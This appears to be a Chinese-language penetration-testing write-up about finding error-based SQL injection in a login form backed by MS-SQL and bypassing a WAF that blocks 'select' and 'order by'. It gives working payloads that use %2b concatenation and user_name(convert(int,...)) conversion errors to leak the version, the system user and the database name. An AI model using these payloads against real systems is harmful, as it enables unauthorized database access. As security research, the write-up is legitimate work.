正文
测试的是登陆功能,此功能会向数据库发送查询的请求,这里我们仔细来看一下,获取我的数据并通过 POST 请求发送。
工具使用的是Burp Suite,这里拦截了请求并将其发送到repeater:
作为 SQL 查询的常规方法,首先需要使用单引号或双引号来进行测试:
email=qaramany'
查看响应,在第 4173 行收到此错误,因此我只是搜索此错误以获取有关与之交互的数据库的更多信息。
直接google搜索一下 error No.: 2147217900这个错误就会知道:
发现使用的是 MS-SQL 数据库进行了基于错误的 SQL 注入,比较麻烦的是暂时没找到任何漏洞利用;
因为这里针对“select”或“order by”等关键字有过滤,这意味着“+select”可能被过滤并返回 500 错误,这是经过50多次的重放,才弄清楚的WAF 逻辑;
所以不能注入一个" select "或" order by "或" group by " 或任何可选的基于错误的攻击向量,当你注入包含上述表达式的查询的时候通常被WAF拦截。
使用%2b字符连接字符串作为bypass。%2B是+的编码
因此,将它与特定函数调用的结果一起使用,这些函数调用会触发对所需数据的数据类型转换错误。
我们现在可以通过一些函数绕过。
类似下面的:
- SUSER_NAME()
- USER_NAME()
- PERMISSIONS()
- DB_NAME()
- FILE_NAME()
- TYPE_NAME()
- COL_NAME()
payload如下:
qaramany'%2buser_name(@@version)
这个payload可以查出数据库的版本
- qaramany: 这是我的名字
- ':触发错误的单引号
- %2b:是+的编码
- User_name():在寻找的数据上触发数据类型转换错误的函数调用
有时我们会得到500错误,所以基于相同的方法创建有效载荷
qaramany'%2buser_name(convert(int,(SYSTEM_USER)))--
这绕过了获取SYSTEM_USER的WAF
一些poc如下:
qaramany’%2buser_name(convert(int,(SESSION_USER))) — qaramany’%2buser_name(UPPER(‘sql+tutorial+is+fun!’)) — qaramany’%2buser_name(IIF(5=4,+’YES’,+’HackedBy_c0nqr0r&0x4m’)) — qaramany’%2buser_name(convert(int,(db_name()))) —
总结
本文是针对 在注入" select "或" order by "或" group by " 或任何可选的基于错误的攻击向量的时候,被WAF拦截的时候的一些思路.
